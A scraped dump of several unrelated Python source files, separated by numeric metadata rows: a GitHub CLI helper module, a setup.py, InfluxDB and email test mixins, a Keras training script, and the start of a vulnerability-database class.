if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
if dir[0] == "~":
dir = os.path.expanduser("~") + dir[1:]
dir = dir + "/" + repo_name.split("/")[1]
try:
Repo.clone_from("https://github.com/" + repo_name, dir)
print("{} cloned to {}".format(repo_name, dir))
return True
except Exception as e:
print(e)
return False
def star_repo(ghub, repo_name=None):
print("Starring repo...")
if repo_name == None:
repo_name = ghub.context.location
star_url = ghub.api_url + ghub.endpoints["user"] + "/" + "starred/" + repo_name
response = ghub.github.get(star_url)
if response.status_code == 204:
print("Repo is already starred.")
elif response.status_code == 404:
resp = ghub.github.put(star_url)
if resp.status_code == 204:
print("{} starred".format(repo_name))
else:
print("Error starring repo")
def unstar_repo(ghub, repo_name=None):
print("Unstarring repo...")
if repo_name == None:
repo_name = ghub.context.location
star_url = ghub.api_url + ghub.endpoints["user"] + "/" + "starred/" + repo_name
response = ghub.github.get(star_url)
if response.status_code == 204:
resp = ghub.github.delete(star_url)
if resp.status_code == 204:
print("{} unstarred".format(repo_name))
else:
print("Error unstarring repo")
elif response.status_code == 404:
print("Repo is not starred.")
def watch_repo(ghub, repo_name=None):
print("Subscribing to repo...")
if repo_name == None:
repo_name = ghub.context.location
watch_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/subscription"
response = ghub.github.get(watch_url)
if response.status_code == 200:
print("You are already watching this repo.")
elif response.status_code == 404:
resp = ghub.github.put(watch_url)
if resp.status_code == 200:
print("Watching {}".format(repo_name))
else:
print("Error subscribing to repo")
def unwatch_repo(ghub, repo_name=None):
print("Unsubscribing repo...")
if repo_name == None:
repo_name = ghub.context.location
watch_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/subscription"
response = ghub.github.get(watch_url)
if response.status_code == 200:
resp = ghub.github.delete(watch_url)
if resp.status_code == 204:
print("{} unsubscribed".format(repo_name))
else:
print("Error unsubscribing to repo")
elif response.status_code == 404:
print("You are not watching this repo.")
def fork_repo(ghub, repo_name=None):
print("Forking Repo...")
if repo_name == None:
repo_name = ghub.context.location.split("/")
repo_name = "/".join(repo_name[:2])
true_repo_name = repo_name.split("/")[1]
forked_url = (
ghub.api_url
+ ghub.endpoints["repos"]
+ ghub.get_user_username()
+ "/"
+ true_repo_name
)
response = ghub.github.get(forked_url)
if response.status_code == 200:
print("Cannot fork. Repo Already Exists.")
return False
print("Repo is being forked. Please wait for it to complete.", end="")
response = ghub.github.post(
ghub.api_url + ghub.endpoints["repos"] + repo_name + "/forks"
)
if response.status_code == 202:
print(
"\nForking complete. Forked repo to {}".format(
ghub.get_user_username() + "/" + true_repo_name
)
)
return True
else:
print("Error while trying fork.")
return False
def get_prs(ghub, repo_name=None):
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
pr_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/pulls"
response = ghub.github.get(pr_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "pull_requests"
ghub.context.location = repo_name + "/pull_requests"
ghub.context.cache = response.json()
return True
return False
def get_pr(ghub, pr_no):
if not pr_no.isdigit():
print("Invalid PR number")
return False
repo_name = "/".join(ghub.context.location.split("/")[:2])
pr_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/pulls/" + pr_no
response = ghub.github.get(pr_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "pull_request"
ghub.context.location = repo_name + "/pull_requests/" + pr_no
ghub.context.cache = response.json()
return True
elif response.status_code == 404:
print("No PR found with PR number {}".format(pr_no))
return False
def get_pr_info(ghub, info_type="comments"):
info_url = ghub.context.cache["_links"][info_type]["href"]
response = ghub.github.get(info_url)
return response.json(), response.status_code
def get_issues(ghub, repo_name=None):
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
issue_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/issues"
response = ghub.github.get(issue_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "issues"
ghub.context.location = repo_name + "/issues"
ghub.context.cache = response.json()
return True
return False
def get_issue(ghub, issue_no):
if not issue_no.isdigit():
print("Invalid issue number")
return False
repo_name = "/".join(ghub.context.location.split("/")[:2])
issue_url = (
ghub.api_url + ghub.endpoints["repos"] + repo_name + "/issues/" + issue_no
)
response = ghub.github.get(issue_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "issue"
ghub.context.location = repo_name + "/issues/" + issue_no
ghub.context.cache = response.json()
return True
elif response.status_code == 404:
print("No issue found with issue number {}".format(issue_no))
return False
def get_issue_info(ghub, info_type="comments"):
info_url = ghub.context.cache["{}_url".format(info_type)]
response = ghub.github.get(info_url)
return response.json(), response.status_code
| 36.936255
| 99
| 0.584349
| 2,146
| 18,542
| 4.912861
| 0.122088
| 0.093901
| 0.064877
| 0.047804
| 0.63701
| 0.589111
| 0.524044
| 0.485535
| 0.465617
| 0.44143
| 0
| 0.008335
| 0.288211
| 18,542
| 501
| 100
| 37.00998
| 0.790499
| 0.010355
| 0
| 0.504405
| 0
| 0
| 0.178146
| 0.004912
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04185
| false
| 0.002203
| 0.015419
| 0
| 0.129956
| 0.085903
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe7228704cb0dda0e1c0b7305078fa094d1a0478
| 2,843
|
py
|
Python
|
influxdb/tests/server_tests/base.py
|
ocworld/influxdb-python
|
a6bfe3e4643fdc775c97e1c4f457bc35d86e631e
|
[
"MIT"
] | 2
|
2019-10-17T05:36:51.000Z
|
2020-06-30T00:27:22.000Z
|
influxdb/tests/server_tests/base.py
|
ocworld/influxdb-python
|
a6bfe3e4643fdc775c97e1c4f457bc35d86e631e
|
[
"MIT"
] | null | null | null |
influxdb/tests/server_tests/base.py
|
ocworld/influxdb-python
|
a6bfe3e4643fdc775c97e1c4f457bc35d86e631e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Define the base module for server test."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import sys
from influxdb.tests import using_pypy
from influxdb.tests.server_tests.influxdb_instance import InfluxDbInstance
from influxdb.client import InfluxDBClient
if not using_pypy:
from influxdb.dataframe_client import DataFrameClient
def _setup_influxdb_server(inst):
inst.influxd_inst = InfluxDbInstance(
inst.influxdb_template_conf,
udp_enabled=getattr(inst, 'influxdb_udp_enabled', False),
)
inst.cli = InfluxDBClient('localhost',
inst.influxd_inst.http_port,
'root',
'',
database='db')
if not using_pypy:
inst.cliDF = DataFrameClient('localhost',
inst.influxd_inst.http_port,
'root',
'',
database='db')
def _teardown_influxdb_server(inst):
remove_tree = sys.exc_info() == (None, None, None)
inst.influxd_inst.close(remove_tree=remove_tree)
class SingleTestCaseWithServerMixin(object):
"""Define the single testcase with server mixin.
A mixin for unittest.TestCase to start an influxdb server instance
in a temporary directory **for each test function/case**
"""
# 'influxdb_template_conf' attribute must be set
# on the TestCase class or instance.
@classmethod
def setUp(cls):
"""Set up an instance of the SingleTestCaseWithServerMixin."""
_setup_influxdb_server(cls)
@classmethod
def tearDown(cls):
"""Tear down an instance of the SingleTestCaseWithServerMixin."""
_teardown_influxdb_server(cls)
class ManyTestCasesWithServerMixin(object):
"""Define the many testcase with server mixin.
Same as the SingleTestCaseWithServerMixin but this module creates
a single instance for the whole class. Also pre-creates a fresh
database: 'db'.
"""
# 'influxdb_template_conf' attribute must be set on the class itself !
@classmethod
def setUpClass(cls):
"""Set up an instance of the ManyTestCasesWithServerMixin."""
_setup_influxdb_server(cls)
def setUp(self):
"""Set up an instance of the ManyTestCasesWithServerMixin."""
self.cli.create_database('db')
@classmethod
def tearDownClass(cls):
"""Deconstruct an instance of ManyTestCasesWithServerMixin."""
_teardown_influxdb_server(cls)
def tearDown(self):
"""Deconstruct an instance of ManyTestCasesWithServerMixin."""
self.cli.drop_database('db')
| 30.902174
| 74
| 0.655645
| 303
| 2,843
| 5.940594
| 0.343234
| 0.054444
| 0.04
| 0.033333
| 0.263889
| 0.166667
| 0.166667
| 0.098889
| 0.098889
| 0
| 0
| 0.000479
| 0.266268
| 2,843
| 91
| 75
| 31.241758
| 0.862416
| 0.322898
| 0
| 0.382979
| 0
| 0
| 0.029252
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.170213
| false
| 0
| 0.191489
| 0
| 0.404255
| 0.021277
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe739da7293d52a3a7c4940166ba21b32df8a642
| 9,107
|
py
|
Python
|
genemail/testing.py
|
cadithealth/genemail
|
d906ad9deec70a6b19b66c244044d4466df2371a
|
[
"MIT"
] | 5
|
2015-08-13T05:22:54.000Z
|
2018-08-28T14:14:55.000Z
|
genemail/testing.py
|
cadithealth/genemail
|
d906ad9deec70a6b19b66c244044d4466df2371a
|
[
"MIT"
] | null | null | null |
genemail/testing.py
|
cadithealth/genemail
|
d906ad9deec70a6b19b66c244044d4466df2371a
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#------------------------------------------------------------------------------
# file: $Id$
# auth: Philip J Grabner <grabner@cadit.com>
# date: 2013/10/21
# copy: (C) Copyright 2013 Cadit Health Inc., All Rights Reserved.
#------------------------------------------------------------------------------
# todo: this could be smarter... for example, it could:
# - detect when references resolve to the same content, but
# by different Content-IDs
# - detect when multipart sections could collapse to the same
# semantic structure
from __future__ import absolute_import
import unittest, email
from .util import smtpHeaderFormat
#------------------------------------------------------------------------------
def canonicalHeaders(message, ignore=None):
'''
Returns a canonical string representation of the `message` headers,
with the following changes made:
* The MIME boundary specified in the "Content-Type" header, if
specified, removed.
* Any headers listed in `ignore` are removed.
:Parameters:
ignore : list(str), optional, default: ['Content-Transfer-Encoding']
List of headers that should not be included in the canonical
form.
'''
if ignore is None:
ignore = ['Content-Transfer-Encoding']
ignore = [key.lower() for key in ignore]
hdrs = {key.lower(): '; '.join(sorted(message.get_all(key)))
for key in message.keys()
if key.lower() not in ignore}
hdrs['content-type'] = '; '.join(['='.join(filter(None, pair))
for pair in message.get_params()
if pair[0].lower() != 'boundary'])
return '\n'.join([
smtpHeaderFormat(key) + ': ' + hdrs[key]
for key in sorted(hdrs.keys())]) + '\n'
#------------------------------------------------------------------------------
def canonicalStructure(message):
ret = message.get_content_type() + '\n'
if not message.is_multipart():
return ret
msgs = message.get_payload()
for idx, msg in enumerate(msgs):
last = idx + 1 >= len(msgs)
indent = '\n|-- ' if not last else '\n '
ret += '|-- ' if not last else '`-- '
ret += indent.join(canonicalStructure(msg)[:-1].split('\n')) + '\n'
return ret
#------------------------------------------------------------------------------
def makemsg(msg, submsg):
if msg is None:
return submsg
return msg + ' (' + submsg + ')'
#------------------------------------------------------------------------------
class EmailTestMixin(object):
mime_cmp_factories = {
'text/html' : lambda self, ct: self.try_assertXmlEqual,
'text/xml' : lambda self, ct: self.try_assertXmlEqual,
'text/*' : lambda self, ct: self.assertMultiLineEqual,
'*/*' : lambda self, ct: self.assertEqual,
}
#----------------------------------------------------------------------------
def registerMimeComparator(self, mimetype, comparator):
def factory(self, ct):
return comparator
self.mime_cmp_factories = dict(EmailTestMixin.mime_cmp_factories)
self.mime_cmp_factories[mimetype] = factory
#----------------------------------------------------------------------------
def _parseEmail(self, eml):
return email.message_from_string(eml)
#----------------------------------------------------------------------------
def assertEmailHeadersEqual(self, eml1, eml2, msg=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailHeadersEqual(eml1, eml2, msg=msg)
#----------------------------------------------------------------------------
def assertNotEmailHeadersEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailHeadersEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email headers %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailStructureEqual(self, eml1, eml2, msg=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailStructureEqual(eml1, eml2, msg=msg)
#----------------------------------------------------------------------------
def assertNotEmailStructureEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailStructureEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email structure %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailContentEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailContentEqual(eml1, eml2, msg=msg, mcf=mime_cmp_factories)
#----------------------------------------------------------------------------
def assertNotEmailContentEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailContentEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email content %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailHeadersEqual(eml1, eml2, msg=msg)
self._assertEmailStructureEqual(eml1, eml2, msg=msg)
self._assertEmailContentEqual(eml1, eml2, msg=msg, mcf=mime_cmp_factories)
#----------------------------------------------------------------------------
def assertNotEmailEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
try:
self.assertEmailEqual(eml1, eml2, msg=msg, mime_cmp_factories=mime_cmp_factories)
self.fail(msg or 'email %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def _assertEmailHeadersEqual(self, msg1, msg2, msg=None):
hdr1 = 'EMAIL HEADERS:\n' + canonicalHeaders(msg1)
hdr2 = 'EMAIL HEADERS:\n' + canonicalHeaders(msg2)
self.assertMultiLineEqual(hdr1, hdr2, msg=msg)
#----------------------------------------------------------------------------
def _assertEmailStructureEqual(self, msg1, msg2, msg=None):
str1 = 'EMAIL STRUCTURE:\n' + canonicalStructure(msg1)
str2 = 'EMAIL STRUCTURE:\n' + canonicalStructure(msg2)
self.assertMultiLineEqual(str1, str2, msg=msg)
#----------------------------------------------------------------------------
def _assertEmailContentEqual(self, msg1, msg2, msg=None, mcf=None, context=None):
if context is None:
context = 'component root'
self.assertEqual(
msg1.is_multipart(), msg2.is_multipart(),
msg=makemsg(msg, context + ' is not multipart similar'))
self.assertEqual(
msg1.get_content_type(), msg2.get_content_type(),
msg=makemsg(msg, context + ' has content-type mismatch'))
if context == 'component root':
context = 'component ' + msg1.get_content_type()
if not msg1.is_multipart():
return self._assertEmailPayloadEqual(
msg1, msg2, msg=msg, mcf=mcf, context=context)
msgs1 = msg1.get_payload()
msgs2 = msg2.get_payload()
self.assertEqual(
len(msgs1), len(msgs2),
msg=makemsg(msg, context + ' has sub-message count mismatch'))
for idx, submsg in enumerate(msgs1):
sctxt = context + '[' + str(idx) + '] > ' + submsg.get_content_type()
self._assertEmailContentEqual(
submsg, msgs2[idx], msg=msg, mcf=mcf, context=sctxt)
#----------------------------------------------------------------------------
def _assertEmailPayloadEqual(self, msg1, msg2, msg=None, mcf=None, context='message'):
# paranoia...
self.assertFalse(msg1.is_multipart() or msg2.is_multipart())
self.assertEqual(msg1.get_content_type(), msg2.get_content_type())
# /paranoia...
dat1 = msg1.get_payload(decode=True)
dat2 = msg2.get_payload(decode=True)
def getcmp(msg, mcf):
ret = mcf.get(msg.get_content_type())
if ret is None:
ret = mcf.get(msg.get_content_maintype() + '/*')
if ret is None:
ret = mcf.get('*/*')
return ret
pcmp = None
if mcf is not None:
pcmp = getcmp(msg1, mcf)
if pcmp is None:
pcmp = getcmp(msg1, self.mime_cmp_factories)
self.assertIsNotNone(
pcmp, 'no comparator for mime-type "%s"' % (msg1.get_content_type(),))
pcmp = pcmp(self, msg1.get_content_type())
try:
pcmp(dat1, dat2)
except AssertionError as err:
raise AssertionError(
makemsg(msg, context + ' has different payload') + '; ' + err.message)
#----------------------------------------------------------------------------
def try_assertXmlEqual(self, dat1, dat2, msg=None):
if hasattr(self, 'assertXmlEqual'):
return self.assertXmlEqual(dat1, dat2)
return self.assertMultiLineEqual(dat1, dat2)
#------------------------------------------------------------------------------
# end of $Id$
#------------------------------------------------------------------------------
| 41.584475
| 88
| 0.533326
| 899
| 9,107
| 5.302558
| 0.220245
| 0.043633
| 0.041536
| 0.029369
| 0.310678
| 0.28005
| 0.259702
| 0.200336
| 0.155444
| 0.127124
| 0
| 0.017458
| 0.16976
| 9,107
| 218
| 89
| 41.775229
| 0.613014
| 0.284616
| 0
| 0.216783
| 0
| 0
| 0.072536
| 0.003875
| 0
| 0
| 0
| 0.004587
| 0.321678
| 1
| 0.13986
| false
| 0.027972
| 0.020979
| 0.013986
| 0.251748
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe75c11d0a13c6adf86f05d6ce0d9f94ca54fb9c
| 5,410
|
py
|
Python
|
src/training_utils/training.py
|
JoseLuisRojasAranda/tfmodels
|
56dce0236f0cc03dd7031aecf305d470c9fb97a9
|
[
"MIT"
] | 1
|
2020-06-05T23:25:03.000Z
|
2020-06-05T23:25:03.000Z
|
src/training_utils/training.py
|
JoseLuisRojasAranda/tfmodels
|
56dce0236f0cc03dd7031aecf305d470c9fb97a9
|
[
"MIT"
] | null | null | null |
src/training_utils/training.py
|
JoseLuisRojasAranda/tfmodels
|
56dce0236f0cc03dd7031aecf305d470c9fb97a9
|
[
"MIT"
] | null | null | null |
import os
from os import path
import json
import shutil
import tensorflow as tf
import numpy as np
# Importa cosas de Keras API
from tensorflow.keras.optimizers import Adam, RMSprop
from tensorflow.keras.models import Sequential
from tensorflow.keras.utils import plot_model
# Importa callbacks del modelo
from training_utils.callbacks import TrainingCheckPoints
from tensorflow.keras.callbacks import CSVLogger, TensorBoard
# Importa cosas para graficar el entrenameinto
from training_utils.training_graphs import graph_confusion_matrix
from training_utils.training_graphs import graph_model_metrics
# Function that continues the training of a model
# Args:
# path_to_model: path were to find the model and setup
# dataset: tuple of tensorflow dataset of (train, test)
def continue_training(path_to_model, dataset):
if not path.exists(path_to_model):
print("[ERROR] El path a la carpeta del modelo no existe")
return
# carga el setup del modelo
setup = None
with open(path_to_model+"setup.json", "r") as data:
setup = json.load(data)
# carga el estado de entrenamiento
state = None
with open(path_to_model+"checkpoints/"+"training_state.json", "r") as data:
state = json.load(data)
print("[INFO] Continuando entrenameinto de modelo.")
# carga el modelo
model_name = "model_checkpoint_{}.h5".format(state["epoch"]-1)
model = tf.keras.models.load_model(path_to_model+"checkpoints/"+model_name)
# vuelve a compilar el modelo
opt = Adam(lr=state["learning_rate"])
model.compile(loss=setup["loss"], optimizer=opt, metrics=setup["metrics"])
fit_model(compiled_model=model, dataset=dataset, opt=opt,
epochs=setup["epochs"], initial_epoch=state["epoch"],
path=setup["path"], continue_train=True, classes=setup["classes"])
# Method that starts the model training
# Args:
# setup: Dictionary with the model setup
# model: the keras.Model architecture to train
# dataset: tuple of tensorflow dataset of (train, test)
def train_model(setup, model, dataset):
# Asegura que el path sea el correcto
if not path.exists(setup["path"]):
os.makedirs(setup["path"])
else:
# Borra las carpetas si ya existen
if path.exists(setup["path"]+"checkpoints"):
shutil.rmtree(setup["path"]+"checkpoints")
if path.exists(setup["path"]+"logs"):
shutil.rmtree(setup["path"]+"logs")
# crea carpeta donde se van a guardar los checkpoints
if not path.exists(setup["path"]+"checkpoints"):
os.mkdir(setup["path"] + "checkpoints")
# Escribe el setup del entrenamiento
with open(setup["path"]+"setup.json", "w") as writer:
json.dump(setup, writer, indent=4)
print("[INFO] Entrenando modelo.")
# Dibuja la arquitectura del modelo
plot_model(model, to_file=setup["path"]+"model_architecture.png",
show_shapes=True, show_layer_names=True, expand_nested=False)
# Crea optimizador, por defecto Adam
opt = Adam(lr=setup["learning_rate"])
#opt = RMSprop(lr=setup["learning_rate"])
# Compila el modelo
model.compile(loss=setup["loss"], optimizer=opt, metrics=setup["metrics"])
fit_model(compiled_model=model, dataset=dataset, opt=opt,
epochs=setup["epochs"], path=setup["path"], classes=setup["classes"])
# Metodo, que entrena un modelo ya compilado, implementa callbacks de
# tensorboard, log a un archivo CSV y creacion de checkpoints cuando ocurre
# mejoras en el loss, tambien grafica y crea matriz de confusion
# Args:
# compiled_model: keras.Model ya compilado
# dataset: tuple of tensorflow dataset of (train, test)
# opt: keras.Optimizer used in training
# epochs: The number of epochs to train
# initial_epoch: Epoch to start training, 0 for normal training
# continue_train: if the model is continuing training
# classes: array of classes that the model predict
def fit_model(compiled_model=None, # El modelo debe de estar complicado
dataset=None,
opt=None,
epochs=None,
initial_epoch=0,
path=None,
continue_train=False,
classes=None):
# obtiene el dataset
train, test = dataset
# Callbacks durante entrenamiento
relative = 0
if initial_epoch >= 1:
relative = initial_epoch
callbacks = [
#TrainingCheckPoints(path+"checkpoints/", relative_epoch=relative),
CSVLogger(path+"training_log.csv", append=continue_train),
TensorBoard(log_dir=path+"logs")
]
# Entrena el modelo
history = compiled_model.fit(train, initial_epoch=initial_epoch, epochs=epochs,
callbacks=callbacks, validation_data=test)
# Guarda el modelo
print("[INFO] Serializing model.")
compiled_model.save(path + "model.h5")
# Crea grafica del entrenamiento
graph_model_metrics(csv_path=path+"training_log.csv",
img_path=path+"metrics_graph.png")
# Crea confusion matrix
if test != None:
print("[INFO] Creando matriz de confusion")
graph_confusion_matrix(model=compiled_model, test_dataset=test,
classes=classes, path=path+"confusion_matrix.png")
def load_model(path):
model = tf.keras.models.load_model(path + "model.h5")
with open(path + "setup.json", "r") as data:
setup = json.load(data)
return model, setup["classes"]
| 35.359477
| 84
| 0.697227
| 717
| 5,410
| 5.153417
| 0.267782
| 0.029229
| 0.017862
| 0.020568
| 0.200271
| 0.18295
| 0.15751
| 0.117997
| 0.106631
| 0.064411
| 0
| 0.002079
| 0.199815
| 5,410
| 152
| 85
| 35.592105
| 0.851467
| 0.302773
| 0
| 0.074074
| 0
| 0
| 0.154775
| 0.011803
| 0
| 0
| 0
| 0.006579
| 0
| 1
| 0.049383
| false
| 0
| 0.160494
| 0
| 0.234568
| 0.061728
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe774ebe12faa6fdf372c8d9db66e886229109cb
| 3,563
|
py
|
Python
|
setup.py
|
truggles/pudl
|
6f41664f8243b8f7aafdbbfc8522f96043dbf561
|
[
"MIT"
] | null | null | null |
setup.py
|
truggles/pudl
|
6f41664f8243b8f7aafdbbfc8522f96043dbf561
|
[
"MIT"
] | null | null | null |
setup.py
|
truggles/pudl
|
6f41664f8243b8f7aafdbbfc8522f96043dbf561
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""Setup script to make PUDL directly installable with pip."""
import os
from pathlib import Path
from setuptools import find_packages, setup
install_requires = [
'coloredlogs',
'datapackage>=1.9.0',
'dbfread',
'goodtables',
'matplotlib',
'networkx>=2.2',
'numpy',
'pandas>=0.24',
'pyarrow>=0.14.0',
'pyyaml',
'scikit-learn>=0.20',
'scipy',
'sqlalchemy>=1.3.0',
'tableschema',
'tableschema-sql>=1.1.0',
'timezonefinder',
'xlsxwriter',
]
# We are installing the PUDL module to build the docs, but the C libraries
# required to build snappy aren't available on RTD, so we need to exclude it
# from the installed dependencies here, and mock it for import in docs/conf.py
# using the autodoc_mock_imports parameter:
if not os.getenv('READTHEDOCS'):
install_requires.append('python-snappy')
doc_requires = [
'doc8',
'sphinx',
'sphinx_rtd_theme',
]
test_requires = [
'bandit',
'coverage',
'doc8',
'flake8',
'flake8-docstrings',
'flake8-builtins',
'pep8-naming',
'pre-commit',
'pydocstyle',
'pytest',
'pytest-cov',
'nbval',
]
readme_path = Path(__file__).parent / "README.rst"
long_description = readme_path.read_text()
setup(
name='catalystcoop.pudl',
description='An open data processing pipeline for public US utility data.',
long_description=long_description,
long_description_content_type='text/x-rst',
use_scm_version=True,
author='Catalyst Cooperative',
author_email='pudl@catalyst.coop',
maintainer='Zane A. Selvans',
maintainer_email='zane.selvans@catalyst.coop',
url="https://catalyst.coop/pudl",
project_urls={
"Source": "https://github.com/catalyst-cooperative/pudl",
"Documentation": "https://catalystcoop-pudl.readthedocs.io",
"Issue Tracker": "https://github.com/catalyst-cooperative/pudl/issues",
},
license='MIT',
keywords=[
'electricity', 'energy', 'data', 'analysis', 'mcoe', 'climate change',
'finance', 'eia 923', 'eia 860', 'ferc', 'form 1', 'epa ampd',
'epa cems', 'coal', 'natural gas', ],
python_requires='>=3.7, <3.8.0a0',
setup_requires=['setuptools_scm'],
install_requires=install_requires,
extras_require={
"doc": doc_requires,
"test": test_requires,
},
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Science/Research',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering',
],
packages=find_packages('src'),
package_dir={'': 'src'},
# package_data is data that is deployed within the python package on the
# user's system. setuptools will get whatever is listed in MANIFEST.in
include_package_data=True,
# This defines the interfaces to the command line scripts we're including:
entry_points={
'console_scripts': [
'pudl_data = pudl.workspace.datastore_cli:main',
'pudl_setup = pudl.workspace.setup_cli:main',
'pudl_etl = pudl.cli:main',
'datapkg_to_sqlite = pudl.convert.datapkg_to_sqlite:main',
'ferc1_to_sqlite = pudl.convert.ferc1_to_sqlite:main',
'epacems_to_parquet = pudl.convert.epacems_to_parquet:main',
]
},
)
| 30.452991
| 79
| 0.641033
| 419
| 3,563
| 5.310263
| 0.563246
| 0.026966
| 0.017079
| 0.026966
| 0.033258
| 0.033258
| 0
| 0
| 0
| 0
| 0
| 0.016181
| 0.219478
| 3,563
| 116
| 80
| 30.715517
| 0.783891
| 0.156329
| 0
| 0.020408
| 0
| 0
| 0.488473
| 0.078851
| 0
| 0
| 0
| 0.008621
| 0
| 1
| 0
| false
| 0
| 0.030612
| 0
| 0.030612
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe77c98170bf9d8232497412401b6f749ddb70f7
| 7,836
|
py
|
Python
|
src/vulnix/nvd.py
|
dermetfan/vulnix
|
06daccda0e51098fbdbc65f61b6663c5c6df9358
|
[
"BSD-3-Clause"
] | 217
|
2016-07-03T10:45:56.000Z
|
2022-03-30T12:06:51.000Z
|
src/vulnix/nvd.py
|
dermetfan/vulnix
|
06daccda0e51098fbdbc65f61b6663c5c6df9358
|
[
"BSD-3-Clause"
] | 70
|
2016-06-27T08:47:22.000Z
|
2022-01-22T19:10:53.000Z
|
src/vulnix/nvd.py
|
dermetfan/vulnix
|
06daccda0e51098fbdbc65f61b6663c5c6df9358
|
[
"BSD-3-Clause"
] | 24
|
2016-06-27T09:23:50.000Z
|
2022-01-30T05:32:22.000Z
|
from BTrees import OOBTree
from datetime import datetime, date, timedelta
from persistent import Persistent
from .vulnerability import Vulnerability
import fcntl
import glob
import gzip
import json
import logging
import os
import os.path as p
import requests
import transaction
import ZODB
import ZODB.FileStorage
DEFAULT_MIRROR = 'https://nvd.nist.gov/feeds/json/cve/1.1/'
DEFAULT_CACHE_DIR = '~/.cache/vulnix'
_log = logging.getLogger(__name__)
class NVD(object):
"""Access to the National Vulnerability Database.
https://nvd.nist.gov/
"""
def __init__(self, mirror=DEFAULT_MIRROR, cache_dir=DEFAULT_CACHE_DIR):
self.mirror = mirror.rstrip('/') + '/'
self.cache_dir = p.expanduser(cache_dir)
current = date.today().year
self.available_archives = [y for y in range(current-5, current+1)]
def lock(self):
self._lock = open(p.join(self.cache_dir, 'lock'), 'a')
try:
fcntl.lockf(self._lock, fcntl.LOCK_EX | fcntl.LOCK_NB)
except OSError:
_log.info('Waiting for NVD lock...')
fcntl.lockf(self._lock, fcntl.LOCK_EX)
def __enter__(self):
"""Keeps database connection open while in this context."""
_log.debug('Opening database in %s', self.cache_dir)
os.makedirs(self.cache_dir, exist_ok=True)
self.lock()
self._db = ZODB.DB(ZODB.FileStorage.FileStorage(
p.join(self.cache_dir, 'Data.fs')))
self._connection = self._db.open()
self._root = self._connection.root()
try:
self._root.setdefault('advisory', OOBTree.OOBTree())
self._root.setdefault('by_product', OOBTree.OOBTree())
self._root.setdefault('meta', Meta())
# may trigger exceptions if the database is inconsistent
list(self._root['by_product'].keys())
if 'archives' in self._root:
_log.warn('Pre-1.9.0 database found - rebuilding')
self.reinit()
except (TypeError, EOFError):
_log.warn('Incompatible objects found in database - rebuilding DB')
self.reinit()
return self
